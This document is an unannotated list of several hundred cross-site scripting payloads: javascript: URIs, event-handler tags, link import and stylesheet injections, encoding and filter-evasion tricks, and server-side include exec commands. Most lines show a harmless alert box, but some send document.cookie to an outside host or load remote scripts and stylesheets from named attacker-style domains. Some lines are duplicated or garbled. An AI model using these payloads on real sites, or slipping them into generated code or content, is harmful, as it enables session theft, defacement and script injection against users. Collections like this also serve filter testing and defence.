- javascript: + -alert(1)
- javascript:” + “-alert(1)
- javascript:alert(1);
- javascript:alert(1)//
- javascript:alert(1)
- JaVaScRipT: alert (1)
- JaVaScRipT:alert(1)
- JavaSCript:alert(123)
- javascript:alert(1)//INJECTX
- <javascript:alert(1) onclick=location=tagName>click me! <== doesn’t work! So…
- javascript:alert%281%29;
- javascript:alert%281%29
- javascript:alert(document.domain);
- javascript:alert(“hellox worldss”)
- javascript:alert(1)
- javascript:alert(document.cookie) // AsharJaved
- javascript:alert()// →</script></textarea></style></title><a”//’ onclick=alert()//>*/alert()/*
- javascript:alert()//<svg/onload=alert()>’-alert(“-alert()-”)-’
- javascript://anything%0D%0A%0D%0Awindow.alert(1)
- javas + cript:’click me! + #’-alert(1)
- javas + cript:”click me! + #”-alert(1)
- javas + cript:click me! + #-alert(1)
- javascrip + t:’click me! + #’-alert(1)
- javascrip + t:”click me! + #”-alert(1)
- javascrip + t:click me! + #-alert(1)
- javascript + :’click me! + #’-alert(1)
- javascript + :”click me! + #”-alert(1)
- javascript + :click me! + #-alert(1)
- javascript: + /*click me! + #*/alert(1)
- javascript: +click me! + #-alert(1)
- javascript + :”-’click me! + http://..."-'click me</javascript>#’-alert(1)
- javas + cript:-click me! + http://domain/page?p=%3Cjavas%20onclick=location=tagName%2binnerHTML%2bURL%3Ecript:-click me!</javas>#-alert(1)
- javas + cript:”-’click me! + http://domain/page?p=<javas%20onclick=location=tagName%2binnerHTML%2bURL>cript:"-'click me!</javas>#’-alert(1)
- javascript:-click me! + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:-click me!</j>#-alert(1)
- javascript:”-’click me! + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:”-’click me!</j>#’-alert(1)
- javascript:/*click me! + <j 1=”*/””-alert(1)<! — K
- javascript:/*click me! + */” + <j 1=”-alert(9)//” …
- javascript:/*click me! + */” + <j”-alert(9)<! — …
- javascript:/*click me! + */ + <x 1= -alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
- javascript:/*click me! + */” + <x 1=” -alert(9)//” onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
- javascript:/*click me! + */ + <x-alert(9)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
- javascript:/*click me! + */” + <x”-alert(9)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
- javascript:alert(1)
- javaSCRIPT & colon; alert (1)
- javaSCRIPT:alert(1)
- javaSCRIPT:confirm(1)
- ;})javascript:confirm(0);
- ;javascript:confirm(0);
- “javascript:confirm(0);”,
- javascript:confirm(0);
- javascript:confirm(1)//
- JaVaScRipT:confirm(1)
- JaVAscRIPT:confirm(4)
- javascript:confirm(7)//://svg
- javascript:confirm&lpar�A1&rpar�A
- javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))
- javascript:document.cookie=window.prompt(“edit cookie:”,document.cookie);void(0);
- javascript:document.scripts[0].src=’http://127.0.0.1/yy.js';void(0);
- javascript:document.write(“<script src=xxx></script>”)
- javascript:document.write(unescape(‘<script src=”http://www.xxxx.com/x.js"></script>'));
- javascript:%E2%80%A8alert`1`
- javascript:eval(unescape(location.href))
- javascript:HTMLDocument.__proto__.__defineSetter__(“prototype”,function(){try{d.d.d}catch(e){confirm(e.stack)}})
- javascript: + http://domain/page?p=<javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)
- javascript:- + http://domain/page?p=<javascript:- onclick=location=tagName%2bURL>click me!#-alert(1)
- javascript:”-’ + http://domain/page?p=<javascript:"-' onclick=location=tagName%2bURL>click me!#’-alert(1)
- javas + cript: + http://domain/page?p=<javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
- javascript: + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)
- javascripT://https://google.com%0aalert(1);//https://google.com
- <javascript id=:alert(195) onmouseover=location=tagName%2Bid>00000
- <javascript id=:alert%26%2340;39%26%2341 onmouseover=location=tagName%2Bid>00000
- <javascript id=:alert(38) onmouseover=location=tagName%2Bid>00000
- <javascript id=:alert(193) onmouseover=location=tagName+id>00000
- <javascript id=:alert(194) onmouseover=location=tagName+id>00000
- javascript:/* + <j 1=”*/””-alert(1)<!V onclick=location=innerHTML%2bouterHTML>
- javascript:/* + <j 1=*/-alert(1)<!V onclick=location=innerHTML%2bouterHTML>
- javascript = jAvascript
- Javascript = jAvascript
- jaVasCript:/*-/*`/*`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>
- jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
- <! — jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e →
- jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e
- jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e
- <javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
- <javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>’click me!</javascript:>#’-alert(1)
- <javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>click me!</javascript:>#-alert(1)
- <javascript onclick=alert(tagName%2Blocation.hash)>click me!#:alert(1)
- <javascript: onclick=alert(tagName%2Blocation.hash)>click me!#alert(1)
- <javascript onclick=alert(tagName)>click me!
- jaVasCript:, oNcliCk=, et al.
- <javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)
- <javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>’click me!#’-alert(1)
- <javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>click me!#-alert(1)
- <javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:/*click me!#*/alert(9)
- <javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:’click me!#’-alert(9)
- <javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:click me!#-alert(9)
- <javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)
- <javascript:- onclick=location=tagName%2bURL>click me!#-alert(1)
- <javascript:”-’ onclick=location=tagName%2bURL>click me!#’-alert(1)
- <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me!
- <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me!#*/alert(1)
- <javascript onclick=location=tagName+innerHTML+location.hash>:’click me!#’-alert(1)
- <javascript onclick=location=tagName+innerHTML+URL>:”-’click me!</javascript>#’-alert(1)
- <javascript onclick=location=tagName+location.hash(1)>click me!#:alert(1)
- <javascript: onclick=location=tagName+URL>click me!#%0Aalert(1)
- <javascript:”-’ onclick=location=tagName+URL>click me!#’-alert(1)
- javascript:prompt(1)#{“action”:1}
- “javascript:prompt(/compaXSS/.source);var x = prompt;x(0);x(/XSS/.source);x”
- /”/_javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x
- javascript:prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x
- javascript:propmpt(1)
- javascript:// →</script></title></style>”/</textarea>*/<alert()/*’ onclick=alert()//>a
- javascript:/* →]]>%>?></script></title></textarea></noscript></style></xmp>”>[img=1,name=/alert(1)/.source]<img — /style=a:expression(/*'/- /*',/**/eval(name)/*%2A///*///);width:100%;height:100%;position:absolute;-ms- behavior:url(#default#time2) name=alert(1)onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>”
- ‘/(javascript\s*:)/Usi’,
- javascript<TAB>:alert(1)
- javascript://’//” →</textarea></style></script></title><b onclick= alert()//>*/alert()/*
- javascript://</title>”/</script></style></textarea/ →*/<alert()/*’ onclick=alert()//>/
- javascript://</title></style></textarea> →</script><a”//’ onclick=alert()//>*/alert()/*
- javascript://’/</title></style></textarea></script> →<p” onclick=alert()//>*/alert()/*
- javascript:// →</title></style></textarea></script><svg “//’ onclick=alert()//
- javascript:/* →</title></style></textarea></script></xmp><svg/onload=’+//+/onmouseover=1/+/[*/[]/+alert(1)//’>
- javascript:/* →</title></style></textarea></script></xmp><svg/onload=’+/”/+/onmouseover=1/+/[*/[]/+alert(1)//’>
- javascript://</title></textarea></style></script →<li ‘//” ‘*/alert()/*’, onclick=alert()//
- javascript:\u0061lert(1)
- javascript: \ u0061lert & # x28; 1 ??& # x29
- javascript:\u0061lert(1)
- (javascript:window.onerror=confirm;throw%20document.cookie)
- javascript:alert(document.cookie)
- javascript:confirm(document.cookie)
- <javas onclick=location=tagName%2binnerHTML%2bURL>cript:-click me!</javas>#-alert(1)
- <javas onclick=location=tagName%2binnerHTML%2bURL>cript:”-’click me!</javas>#’-alert(1)
- <javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
- <javas onclick=location=tagName+innerHTML+URL>cript:”-’click me!</javas>#’-alert(1)
- <javas onclick=location=tagName+innerHTML+URL>cript:</javas>#%0Aalert(1)
- javas + script: + ale + rt + (1)
- javas & Tab; cript: \ u0061lert (1);
- javas	cript:\u0061lert(1);
- javascript:name
- j
a
vas
cript:confirm(1);
- <j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>
- <j onclick=location=innerHTML%2bURL>javascript:-click me!</j>#-alert(1)
- <j onclick=location=innerHTML%2bURL>javascript:”-’click me!</j>#’-alert(1)
- <j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)
- <j onclick=location=innerHTML>javascript%26colon;alert(1)//
- <j onclick=location=innerHTML>javascript:alert(1)//
- <j onclick=location=innerHTML+URL>javascript:”-’click me!</j>#’-alert(1)
- <j onclick=location=innerHTML+URL>javascript:</j>#%0Aalert(1)
- <j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>
- $(‘ jqueryselector’).append(‘some text to append’);
- JSON.parse(‘{“__proto__”:[“a”,1]}’)
- JSP a = val1
- <keygen autofocus onfocus=alert(1)>
- <keygen autofocus onfocus=alert(104)>
- <keygen autofocus onfocus=alert(1)>//INJECTX
- <keygen id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>”>/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
- “>/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
- “>/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
- <kukux onanimationend=alert(34)>
- <kukux style=animation-name:n onanimationend=alert(43)>
- <kukux style=display:block;position:absolute;background-color:red;font-size:999px onmouseenter=alert(document.domain)></kukux>
- l= 0 || ‘str’,m= 0 || ‘sub’,x= 0 || ‘al’,y= 0 || ‘ev’,g= 0 || ‘tion.h’,f= 0 || ‘ash’,k= 0 || ‘loca’,d= (k) + (g) + (f),a
- <label class=”<% confirm(1) %>”>
- language=vbs>test</b>
- <LAYER id=XSS SRC=”http://xxxx.com/scriptlet.html"></LAYER>
- <LAYER SRC=”http://ha.ckers.org/
- <;LAYER SRC=”;http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;
- <LAYER SRC=”http://ha.ckers.org/scriptlet.html"></LAYER>
- <Layer+src=”http://localhost">
- <LAYER src=”http://xss.ha.ckers.org/a.js"></layer>
- <LAYER SRC=”http://xss.ha.ckers.org/a.js"></layer>
- <LAYER SRC=”javascript:document.vulnerable=true;”></LAYER>
- <LAYER SRC=”%(scriptlet)s”></LAYER>
- {}let{}={}
- let=[`const`];
- let=[`const`];(_=_=>let+`ructor`)[_`${_=`ale`}`](_+`rt(let)`)``
- let:let{let:[x=1]}=[alert(1)]
- (_=_=>let+`ructor`)
- <limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
- <limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
- <limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
- <limited_xss_point>eval(get(‘http://xxx.com/x'));</limited_xss_point>
- <limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
- <limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
- <limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
- <limited_xss_point>loads(‘http://xxx.com/x');</limited_xss_point>
- <link%20rel=”import”%20href=”?bypass=<script>confirm(document.domain)</script>”>
- <link%20rel=import%20href=http://avlidienbrunn.se/test.php>
- <link%20rel=import%20href=https:html5sec.org/test.swf
- <link href=”http://host/xss.css">
- <link href=”javascript:alert(1)” rel=”next”>
- <link+id=p1+rel=import+href=/dom/sinks.html>&name=<img/src/onerror=alert(1)>
- <link rel=”import”
- <link rel=import href=angular.html><p ng-app>{{constructor.constructor(‘alert(1)’)()}}
- <link rel=import href=angular.html><p ng-app>{{constructor.constructor(‘alert(18)’)()}}
- <link rel=import href=/bypass/babel-standalone.html><svg><script type=text/jsx>//<! —
- <link rel=import href=/bypass/babel-standalone.html><svg><script type=text/jsx>//<! — alert(21)// →</svg><script>0</script>
- <link rel=import href=/bypass/jquery.html><p class=container></p><form class=child><input name=ownerDocument><script><! — alert(19)</script></form>
- <link rel=import href=/bypass/jquery.html><p class=container></p><form class=child><input name=ownerDocument><script><! — alert(1)</script></form>
- <link rel=import href=”/bypass/path/<script>alert(16)</script>”>
- <link rel=import href=/bypass/underscore.html><script id=template>//<%alert`1`%></script>
- <link rel=import href=/bypass/underscore.html><script id=template>//<%alert`20`%></script>
- <link rel=import href=/bypass/usercontent/icon.jpg>
- <link rel=import href=/bypass/vue.html><div id=app>{{constructor.constructor(‘alert(1)’)()}}
- <link rel=import href=”data:,%%0D3Cscript>alert(68)%%0D3C%%0D2Fscript>
- <link rel=import href=data:text/html;base64,PHNjcmlwdD5wb3B1cD0xOzwvc2NyaXB0Pg==>
- <link rel=import href=”data:text/html,<script>alert(1)</script>
- <link rel=import href=”data:text/html,<script>alert(1)</script>
- “><link rel=import href=data:text/html,<script>alert(1)</script>
- <link rel=”import” href=”data:text/html,<script>alert(document.domain)< ;/script>
- <link rel=import href=”data:text/html,<script>alert(1)</script>
- “><link rel=import href=data:text/html,<script>alert(1)</script>
- <link rel=”import” href=”data:x,<script>alert(1)</script>
- <link rel=import href=//evil>
- <link rel=import href=/%http://0d-z.exeye.io >
- <link rel=import href=/upload/…..>
- <link rel=”import” href=”//xss.cx”>
- <link rel=import onerror=confirm(1)>
- <link/rel=prefetch
import
- <link/rel=prefetch
import href=data:q;base64,PHNjcmlwdD5hbGVydCgnQHFhYicpPC9zY3JpcHQ+>
- <link/rel=prefetch
import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4g>
- <link rel=”prefetch” href=”http://xss.cx">
- <link/rel=prefetchimport href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
- <link rel=’preload’ href=’#’ as=’script’ onload=’confirm(203)’>
- <link rel=’preload’ href=’#’ as=’script’ onload=’confirm(domain)’>
- <link rel=stylesheet href=//attacker/test.css>
- <link rel=stylesheet href=’data:,?*%7bx:expression(alert(1))%7D’ >
- <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
- <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d>
- <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
- <link rel=stylesheet href=’data:,+/v8*%7bx:e+AHgAcA-ression(confirm(1))%7D’ >
- <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css">
- “><link rel=”stylesheet” href=”http://8ant.org/asdfqwer.css"><"
- <;LINK REL=”;stylesheet”; HREF=”;http://ha.ckers.org/xss.css";>;
- <LINK REL=”stylesheet” HREF=”http://ha.ckers.org/xss.css">
- <link rel = “stylesheet” href =”http://www.xxx.com/atack.css">
- <LINK REL=”stylesheet” HREF=”http://xss.cx/xss.css">
- <LINK REL=”stylesheet” HREF=”http://xxxx.com/xss.css">
- <LINK REL=”stylesheet” href=”javascript:alert(‘XlSS’);”>
- <;LINK REL=”;stylesheet”; HREF=”;javascript:alert(‘;XSS’;);”;>;
- <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
- <LINK REL=”stylesheet” HREF=”javascript:alert(XSS);”>
- <LINK REL=”stylesheet” HREF=”javascript:confirm(document.location);”>
- <link rel=”stylesheet” href=”javascript:document.vulnerable=true;”>
- <link REL=”stylesheet” HREF=”javascript:document.vulnerable=true;”>
- <LINK REL=”stylesheet” HREF=”javascript:javascript:alert(1);”>
- <listener event=”load” handler=”#y” xmlns=”http://www.w3.org/2001/xml-events" observer=”x”/>
- <listing><img src=1 onerror=alert(1) ></listing>
- <listing><img src=x onerror=confirm(1)></listing>
- <li style=”color:rgb(‘’0,0,�javascript:expression(confirm(1))”>XSS</li>
- <li style=list-style:url() onerror=alert(1)>
- <li style=list-style:url() onerror=alert(1)></li>
- <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
- <LoadingMovMinDuration>3</LoadingMovMinDuration>
- <LoadingMovPercentToLoad>50</LoadingMovPercentToLoad>
- <LoadingMovURL>http://thebest404pageever.com/swf/FUUUUUUUUUUUUUUUUUUUUUUUUUCK.swf</LoadingMovURL>
- <! — localhost/xss.php?q=PAYLOAD →
- location+=[]
- location=’vbscript:alert(1)'
- =location=a?jav\x41script\x3aconfirm\x28a3ZDresearcha?\x29a2>ZDresearch
- location.assign`javascript:alert(1)`
- Location Based Payloads – Part I
- Location.hash[1] = :
- Location.hash[2]= (
- Location.hash[3] = )
- (location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}//<img src=”x:x” onerror=”if(location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}”>
- ;location.href=’http://site’;//
- “;location.href='http://site';//
- location.href`javascript:alert(1)`
- location=`http://google.com/csi ?${escape(document.cookie)}`;
- location=/http/.source+/:/.source[0]+/\//.source[1]+/\//.source[1]+/google.com/.source
- location=’http://\u{e01cc}\u{e01cd}\u{e01ce}\u{e01cf}\u{e01d0}\u{e01d1}\u{e01d2}\u{e01d3}\u{e01d4}\u{e01d5}google\u{e01da}\u{e01db}\u{e01dc}\u{e01dd}\u{e01de}\u{e01df}.com'
- location=’javascript:alert(~1)'
- ‘;location=’javascript://’%2Blocation.hash;’
- location=’javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c %75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)’
- location=’javascript:%61%6c%65%72%74%28%31%29'
- location=’javascript:alert(0)’;
- location`javascript:alert(1)`
- location=’javascript:ale’+’rt(12)’;
- location=javascript:confirm(0);.
- location=’javascript://\u2028alert(1)’;
- location=location.hash
- “;location=location.hash)//#0={};alert(0)
- location=location.hash //FF only
- location=location.hash.slice(1);
- location=location.hash.slice(1); //avoid the #
- “;location=name;//
- location=name;
- location=name
- location=name//’,’javascript:alert(1)’);
- location.reload`javascript:alert(1)`
- location.replace`javascript:alert(1)`
- location.search, tagName, nodeName, outerHTML
- location=unescape`%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%63%6F%6D`
- Lol:Function`alert(1)```````````
- LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
- lol video<!V”href=javascript:alert(1) style=font-size:50px;
- lol video<!Vhref=javascript:alert(1) style=font-size:50px;display:block;color:transparent;
- ( = (
- <
- <
- <
- <
- <![endif] — >
- <! — [if gte IE 4]>
- <A HREF=\”//google\”>XSS</A>
- <A HREF=\”http://0102.0146.0007.00000223/\”>XSS</A>
- <A HREF=\”http://0x42.0x0000066.0x7.0x93/\”>XSS</A>
- <A HREF=\”http://1113982867/\”>XSS</A>
- <A HREF=\”htt p://6 6.000146.0x7.147/\”>XSS</A>
- <A HREF=\”htt p://6 6.000146.0x7.147/\”>XSS</A>
- <A HREF=\”http://66.102.7.147/\”>XSS</A>
- <A HREF=\”http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\”>XSS</A>
- <A HREF=\”http://google.com/\”>XSS</A>
- <A HREF=\”http://google:ha.ckers.org\”>XSS</A>
- <A HREF=\”http://ha.ckers.org@google\”>XSS</A>
- <A HREF=\”http://www.gohttp://www.google.com/ogle.com/\”>XSS</A>
- <A HREF=\”http://www.google.com./\”>XSS</A>
- <a href="http://i.imgur.com/b7sajuK.jpg" download><a href=”http://i.imgur.com/b7sajuK.jpg" download>What a cute kitty!</a></a>
- <A HREF=\”javascript:document.location=’http://www.google.com/’\”>XSS</A>
- <A HREF="//google">XSS</A>
- <A HREF="http://0102.0146.0007.00000223/">XSS</A>
- <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
- <A HREF="http://1113982867/">XSS</A>
- <A HREF="http://66.102.7.147/">XSS</A>
- <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
- <A HREF="http://google.com/">XSS</A>
- <A HREF="http://google:ha.ckers.org">XSS</A>
- <A HREF="http://ha.ckers.org@google">XSS</A>
- <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
- <A HREF="http://www.google.com./">XSS</A>
- <A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A>
- <A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
- <A HREF="//www.google.com/">XSS</A>
- <A HREF=\”//www.google.com/\”>XSS</A>
- <BASE HREF=\”javascript:alert(‘XSS’);//\”>
- <BASE HREF="javascript:alert('XSS');//">
- <BGSOUND SRC=\”javascript:alert(‘XSS’);\”>
- <BGSOUND SRC="javascript:alert('XSS');">
- <BODY BACKGROUND=\”javascript:alert(‘XSS’)\”>
- <BODY BACKGROUND="javascript:alert('XSS');">
- </BODY></HTML>
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\”XSS\”)>
- <BODY ONLOAD=alert('XSS')>
- <BODY ONLOAD=alert(‘XSS’)>
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
- <BR SIZE=\”&{alert(‘XSS’)}\”>
- <br size=\"&{alert('XSS')}\">
- <BR SIZE="&{alert('XSS')}">
- </br style=a:expression(alert())>
- </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <DIV STYLE=\”background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\”>
- <DIV STYLE=\”background-image: url(javascript:alert(‘XSS’))\”>
- <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
- <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="width: expression(alert('XSS'));">
- <DIV STYLE=\”width: expression(alert(‘XSS’));\”>
- <? echo('<SCR)';
- <? echo(‘<SCR)’;
- <EMBED SRC=\”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\” type=\”image/svg+xml\” AllowScriptAccess=\”always\”></EMBED>
- <EMBED SRC=\”http://ha.ckers.org/xss.swf\” AllowScriptAccess=\”always\”></EMBED>
- <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
- <! — #exec cmd=\”/bin/echo ‘<SCR’\” — ><! — #exec cmd=\”/bin/echo ‘IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>’\” — >
- <! — #exec cmd="/bin/echo '<SCRIPT SRC'" — ><! — #exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
- <FRAMESET><FRAME SRC=\”javascript:alert(‘XSS’);\”></FRAMESET>
- <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
- <HEAD><META HTTP-EQUIV=\”CONTENT-TYPE\” CONTENT=\”text/html; charset=UTF-7\”> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
- <HTML><BODY>
- <HTML xmlns:xss><?import namespace=\”xss\” implementation=\”http://ha.ckers.org/xss.htc\”><xss:xss>XSS</xss:xss></HTML>
- <HTML xmlns:xss>
- <! — [if gte IE 4]>
- <iframe src=http://ha.ckers.org/scriptlet.html>
- <IFRAME SRC=http://ha.ckers.org/scriptlet.html <
- <IFRAME SRC=\”javascript:alert(‘XSS’);\”></IFRAME>
- <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
- <IMG DYNSRC=\”javascript:alert(‘XSS’)\”>
- <IMG DYNSRC="javascript:alert('XSS');">
- <IMG \”\”\”><SCRIPT>alert(\”XSS\”)</SCRIPT>\”>
- <IMG LOWSRC=\”javascript:alert(‘XSS’)\”>
- <IMG LOWSRC="javascript:alert('XSS');">
- <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
- <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
- <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
- <IMG SRC='vbscript:msgbox("XSS")'>
- <IMG SRC=\”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\”>
- <IMG SRC=javascript:alert("XSS")>
- <IMG SRC=`javascript:alert(\”RSnake says, ‘XSS’\”)`>
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC=\”javascript:alert(‘XSS’)\”
- <IMG SRC=\” javascript:alert(‘XSS’);\”>
- <IMG SRC=\”javascript:alert(‘XSS’);\”>
- <IMG SRC=javascript:alert(‘XSS’)>
- <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
- <IMG SRC=javascript:alert(&quot;XSS&quot;)>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=JaVaScRiPt:alert('XSS')>
- <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC=\”jav	ascript:alert(‘XSS’);\”>
- <IMG SRC=\”jav
ascript:alert(‘XSS’);\”>
- <IMG SRC=\”jav
ascript:alert(‘XSS’);\”>
- <IMG SRC=\”livescript:[code]\”>
- <IMG SRC=\”mocha:[code]\”>
- <IMG SRC=" &#14; javascript:alert('XSS');">
- <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
- <IMG SRC="jav&#x09;ascript:alert('XSS');">
- <IMG SRC="jav&#x0A;ascript:alert('XSS');">
- <IMG SRC="jav&#x0D;ascript:alert('XSS');">
- <IMG SRC="javascript:alert('XSS')"
- <IMG SRC="javascript:alert('XSS');">
- <IMG SRC="jav	ascript:alert('XSS');">
- <IMG SRC="livescript:[code]">
- <IMG SRC="mocha:[code]">
- <IMG SRC=’vbscript:msgbox(\”XSS\”)’>
- <IMG SRC=javascript:alert('XSS')>
- <img src=xx:x onerror=confirm(1)><script>document.body.innerHTML=document.body.innerText||document.body.textContent</script>
- <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
- <IMG STYLE=\”xss:expr/*XSS*/ession(alert(‘XSS’))\”>
- <IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
- <?import namespace=\”t\” implementation=\”#default#time2\”>
- <INPUT TYPE=\”IMAGE\” SRC=\”javascript:alert(‘XSS’);\”>
- <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
- <label class=”<% confirm(1) %>”>
- <LAYER SRC=\”http://ha.ckers.org/scriptlet.html\”></LAYER>
- <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
